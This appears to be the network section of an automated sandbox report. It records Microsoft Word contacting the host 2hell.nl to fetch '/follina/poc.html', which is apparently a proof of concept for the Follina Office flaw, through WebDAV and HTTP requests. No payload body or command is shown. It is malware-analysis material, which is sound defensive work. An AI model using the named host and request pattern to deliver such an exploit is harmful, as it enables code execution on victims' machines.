Aug 18, 2022 03:26:27.463329077 CEST	8.8.8.8	192.168.2.22	0xbe50	No error (0)	2hell.nl	178.21.112.152	A (IP address)	IN (0x0001)
Aug 18, 2022 03:26:27.517323971 CEST	8.8.8.8	192.168.2.22	0x646c	No error (0)	2hell.nl	178.21.112.152	A (IP address)	IN (0x0001)
Aug 18, 2022 03:26:28.808691025 CEST	8.8.8.8	192.168.2.22	0x12f1	No error (0)	2hell.nl	178.21.112.152	A (IP address)	IN (0x0001)
Aug 18, 2022 03:26:28.828114986 CEST	8.8.8.8	192.168.2.22	0xe6e0	No error (0)	2hell.nl	178.21.112.152	A (IP address)	IN (0x0001)
Aug 18, 2022 03:26:29.923461914 CEST	8.8.8.8	192.168.2.22	0x2057	No error (0)	2hell.nl	178.21.112.152	A (IP address)	IN (0x0001)
Aug 18, 2022 03:26:29.992835045 CEST	8.8.8.8	192.168.2.22	0x5cd7	No error (0)	2hell.nl	178.21.112.152	A (IP address)	IN (0x0001)
Aug 18, 2022 03:26:31.207489967 CEST	8.8.8.8	192.168.2.22	0x6703	No error (0)	2hell.nl	178.21.112.152	A (IP address)	IN (0x0001)
Aug 18, 2022 03:26:31.228089094 CEST	8.8.8.8	192.168.2.22	0x7820	No error (0)	2hell.nl	178.21.112.152	A (IP address)	IN (0x0001)
Aug 18, 2022 03:26:32.346155882 CEST	8.8.8.8	192.168.2.22	0x2c87	No error (0)	2hell.nl	178.21.112.152	A (IP address)	IN (0x0001)
Aug 18, 2022 03:26:32.367182970 CEST	8.8.8.8	192.168.2.22	0x4c7a	No error (0)	2hell.nl	178.21.112.152	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

2hell.nl

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49173	178.21.112.152	443	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
2022-08-18 01:26:14 UTC	0	OUT	OPTIONS /follina/ HTTP/1.1 User-Agent: Microsoft Office Protocol Discovery Host: 2hell.nl Content-Length: 0 Connection: Keep-Alive
2022-08-18 01:26:14 UTC	0	IN	HTTP/1.1 200 OK Date: Thu, 18 Aug 2022 01:25:03 GMT Server: Apache Strict-Transport-Security: max-age=63072000; preload X-Frame-Options: DENY Referrer-Policy: strict-origin-when-cross-origin X-Content-Type-Options: nosniff Allow: GET,HEAD,POST,OPTIONS Content-Length: 0 Connection: close Content-Type: httpd/unix-directory

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49174	178.21.112.152	443	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
2022-08-18 01:26:20 UTC	0	OUT	HEAD /follina/poc.html HTTP/1.1 Connection: Keep-Alive User-Agent: Microsoft Office Existence Discovery Host: 2hell.nl
2022-08-18 01:26:20 UTC	0	IN	HTTP/1.1 200 OK Date: Thu, 18 Aug 2022 01:25:08 GMT Server: Apache Strict-Transport-Security: max-age=63072000; preload X-Frame-Options: DENY Referrer-Policy: strict-origin-when-cross-origin X-Content-Type-Options: nosniff Last-Modified: Mon, 30 May 2022 19:35:11 GMT ETag: "1a76-5e03fc121ca9b" Accept-Ranges: bytes Content-Length: 6774 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.22	49183	178.21.112.152	443	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
2022-08-18 01:26:29 UTC	13	OUT	HEAD /follina/poc.html HTTP/1.1 User-Agent: Microsoft Office Existence Discovery Host: 2hell.nl Content-Length: 0 Connection: Keep-Alive
2022-08-18 01:26:29 UTC	13	IN	HTTP/1.1 200 OK Date: Thu, 18 Aug 2022 01:25:18 GMT Server: Apache Strict-Transport-Security: max-age=63072000; preload X-Frame-Options: DENY Referrer-Policy: strict-origin-when-cross-origin X-Content-Type-Options: nosniff Last-Modified: Mon, 30 May 2022 19:35:11 GMT ETag: "1a76-5e03fc121ca9b" Accept-Ranges: bytes Content-Length: 6774 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.22	49184	178.21.112.152	443	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
2022-08-18 01:26:30 UTC	13	OUT	HEAD /follina/poc.html HTTP/1.1 Connection: Keep-Alive User-Agent: Microsoft Office Existence Discovery Host: 2hell.nl
2022-08-18 01:26:30 UTC	13	IN	HTTP/1.1 200 OK Date: Thu, 18 Aug 2022 01:25:18 GMT Server: Apache Strict-Transport-Security: max-age=63072000; preload X-Frame-Options: DENY Referrer-Policy: strict-origin-when-cross-origin X-Content-Type-Options: nosniff Last-Modified: Mon, 30 May 2022 19:35:11 GMT ETag: "1a76-5e03fc121ca9b" Accept-Ranges: bytes Content-Length: 6774 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.22	49185	178.21.112.152	443	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
2022-08-18 01:26:31 UTC	14	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 66 6f 6c 6c 69 6e 61 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 32 68 65 6c 6c 2e 6e 6c 0d 0a 0d 0a Data Ascii: PROPFIND /follina HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: 2hell.nl
2022-08-18 01:26:31 UTC	14	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 18 Aug 2022 01:25:19 GMT Server: Apache Strict-Transport-Security: max-age=63072000; preload X-Frame-Options: DENY Referrer-Policy: strict-origin-when-cross-origin X-Content-Type-Options: nosniff Location: https://2hell.nl/follina/ Content-Length: 233 Connection: close Content-Type: text/html; charset=iso-8859-1
2022-08-18 01:26:31 UTC	14	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 32 68 65 6c 6c 2e 6e 6c 2f 66 6f 6c 6c 69 6e 61 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://2hell.nl/follina/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.2.22	49186	178.21.112.152	443	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
2022-08-18 01:26:31 UTC	15	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 66 6f 6c 6c 69 6e 61 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 32 68 65 6c 6c 2e 6e 6c 0d 0a 0d 0a Data Ascii: PROPFIND /follina/ HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: 2hell.nl
2022-08-18 01:26:31 UTC	15	IN	HTTP/1.1 405 Method Not Allowed Date: Thu, 18 Aug 2022 01:25:19 GMT Server: Apache Strict-Transport-Security: max-age=63072000; preload X-Frame-Options: DENY Referrer-Policy: strict-origin-when-cross-origin X-Content-Type-Options: nosniff Allow: GET,HEAD,POST,OPTIONS Content-Length: 357 Connection: close Content-Type: text/html; charset=iso-8859-1
2022-08-18 01:26:31 UTC	15	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 47 45 54 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 65 20 55 52 4c 20 2f 66 6f 6c 6c 69 6e 61 2f 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method GET is not allowed for the URL /follina/.</p><p>Additionally, a 405 Method Not Allowed

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.2.22	49187	178.21.112.152	443	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
2022-08-18 01:26:32 UTC	15	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 66 6f 6c 6c 69 6e 61 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 32 68 65 6c 6c 2e 6e 6c 0d 0a 0d 0a Data Ascii: PROPFIND /follina HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: 2hell.nl
2022-08-18 01:26:32 UTC	16	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 18 Aug 2022 01:25:20 GMT Server: Apache Strict-Transport-Security: max-age=63072000; preload X-Frame-Options: DENY Referrer-Policy: strict-origin-when-cross-origin X-Content-Type-Options: nosniff Location: https://2hell.nl/follina/ Content-Length: 233 Connection: close Content-Type: text/html; charset=iso-8859-1
2022-08-18 01:26:32 UTC	16	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 32 68 65 6c 6c 2e 6e 6c 2f 66 6f 6c 6c 69 6e 61 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://2hell.nl/follina/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.2.22	49188	178.21.112.152	443	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
2022-08-18 01:26:32 UTC	16	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 66 6f 6c 6c 69 6e 61 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 32 68 65 6c 6c 2e 6e 6c 0d 0a 0d 0a Data Ascii: PROPFIND /follina/ HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: 2hell.nl
2022-08-18 01:26:32 UTC	16	IN	HTTP/1.1 405 Method Not Allowed Date: Thu, 18 Aug 2022 01:25:21 GMT Server: Apache Strict-Transport-Security: max-age=63072000; preload X-Frame-Options: DENY Referrer-Policy: strict-origin-when-cross-origin X-Content-Type-Options: nosniff Allow: GET,HEAD,POST,OPTIONS Content-Length: 357 Connection: close Content-Type: text/html; charset=iso-8859-1
2022-08-18 01:26:32 UTC	17	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 47 45 54 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 65 20 55 52 4c 20 2f 66 6f 6c 6c 69 6e 61 2f 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method GET is not allowed for the URL /follina/.</p><p>Additionally, a 405 Method Not Allowed

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
16	192.168.2.22	49189	178.21.112.152	443	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
2022-08-18 01:26:32 UTC	17	OUT	GET /follina/poc.html HTTP/1.1 Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14) UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: 2hell.nl If-Modified-Since: Mon, 30 May 2022 19:35:11 GMT If-None-Match: "1a76-5e03fc121ca9b" Connection: Keep-Alive
2022-08-18 01:26:32 UTC	17	IN	HTTP/1.1 304 Not Modified Date: Thu, 18 Aug 2022 01:25:21 GMT Server: Apache Connection: close ETag: "1a76-5e03fc121ca9b"

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
17	192.168.2.22	49190	178.21.112.152	443	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
2022-08-18 01:26:32 UTC	18	OUT	HEAD /follina/poc.html HTTP/1.1 User-Agent: Microsoft Office Existence Discovery Host: 2hell.nl Content-Length: 0 Connection: Keep-Alive
2022-08-18 01:26:32 UTC	18	IN	HTTP/1.1 200 OK Date: Thu, 18 Aug 2022 01:25:21 GMT Server: Apache Strict-Transport-Security: max-age=63072000; preload X-Frame-Options: DENY Referrer-Policy: strict-origin-when-cross-origin X-Content-Type-Options: nosniff Last-Modified: Mon, 30 May 2022 19:35:11 GMT ETag: "1a76-5e03fc121ca9b" Accept-Ranges: bytes Content-Length: 6774 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
18	192.168.2.22	49191	178.21.112.152	443	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
2022-08-18 01:26:33 UTC	18	OUT	HEAD /follina/poc.html HTTP/1.1 User-Agent: Microsoft Office Existence Discovery Host: 2hell.nl Content-Length: 0 Connection: Keep-Alive
2022-08-18 01:26:33 UTC	18	IN	HTTP/1.1 200 OK Date: Thu, 18 Aug 2022 01:25:21 GMT Server: Apache Strict-Transport-Security: max-age=63072000; preload X-Frame-Options: DENY Referrer-Policy: strict-origin-when-cross-origin X-Content-Type-Options: nosniff Last-Modified: Mon, 30 May 2022 19:35:11 GMT ETag: "1a76-5e03fc121ca9b" Accept-Ranges: bytes Content-Length: 6774 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.22	49175	178.21.112.152	443	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
2022-08-18 01:26:24 UTC	0	OUT	OPTIONS /follina HTTP/1.1 Connection: Keep-Alive User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601 translate: f Host: 2hell.nl
2022-08-18 01:26:24 UTC	1	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 18 Aug 2022 01:25:13 GMT Server: Apache Strict-Transport-Security: max-age=63072000; preload X-Frame-Options: DENY Referrer-Policy: strict-origin-when-cross-origin X-Content-Type-Options: nosniff Location: https://2hell.nl/follina/ Content-Length: 233 Connection: close Content-Type: text/html; charset=iso-8859-1
2022-08-18 01:26:24 UTC	1	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 32 68 65 6c 6c 2e 6e 6c 2f 66 6f 6c 6c 69 6e 61 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://2hell.nl/follina/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.22	49176	178.21.112.152	443	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
2022-08-18 01:26:25 UTC	1	OUT	OPTIONS /follina/ HTTP/1.1 Connection: Keep-Alive User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601 translate: f Host: 2hell.nl
2022-08-18 01:26:25 UTC	1	IN	HTTP/1.1 200 OK Date: Thu, 18 Aug 2022 01:25:13 GMT Server: Apache Strict-Transport-Security: max-age=63072000; preload X-Frame-Options: DENY Referrer-Policy: strict-origin-when-cross-origin X-Content-Type-Options: nosniff Allow: GET,HEAD,POST,OPTIONS Content-Length: 0 Connection: close Content-Type: httpd/unix-directory

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.22	49177	178.21.112.152	443	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
2022-08-18 01:26:27 UTC	2	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 66 6f 6c 6c 69 6e 61 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 32 68 65 6c 6c 2e 6e 6c 0d 0a 0d 0a Data Ascii: PROPFIND /follina HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: 2hell.nl
2022-08-18 01:26:27 UTC	2	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 18 Aug 2022 01:25:16 GMT Server: Apache Strict-Transport-Security: max-age=63072000; preload X-Frame-Options: DENY Referrer-Policy: strict-origin-when-cross-origin X-Content-Type-Options: nosniff Location: https://2hell.nl/follina/ Content-Length: 233 Connection: close Content-Type: text/html; charset=iso-8859-1
2022-08-18 01:26:27 UTC	2	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 32 68 65 6c 6c 2e 6e 6c 2f 66 6f 6c 6c 69 6e 61 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://2hell.nl/follina/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.22	49178	178.21.112.152	443	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
2022-08-18 01:26:27 UTC	2	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 66 6f 6c 6c 69 6e 61 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 32 68 65 6c 6c 2e 6e 6c 0d 0a 0d 0a Data Ascii: PROPFIND /follina/ HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: 2hell.nl
2022-08-18 01:26:27 UTC	3	IN	HTTP/1.1 405 Method Not Allowed Date: Thu, 18 Aug 2022 01:25:16 GMT Server: Apache Strict-Transport-Security: max-age=63072000; preload X-Frame-Options: DENY Referrer-Policy: strict-origin-when-cross-origin X-Content-Type-Options: nosniff Allow: GET,HEAD,POST,OPTIONS Content-Length: 357 Connection: close Content-Type: text/html; charset=iso-8859-1
2022-08-18 01:26:27 UTC	3	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 47 45 54 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 65 20 55 52 4c 20 2f 66 6f 6c 6c 69 6e 61 2f 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method GET is not allowed for the URL /follina/.</p><p>Additionally, a 405 Method Not Allowed

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.22	49179	178.21.112.152	443	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
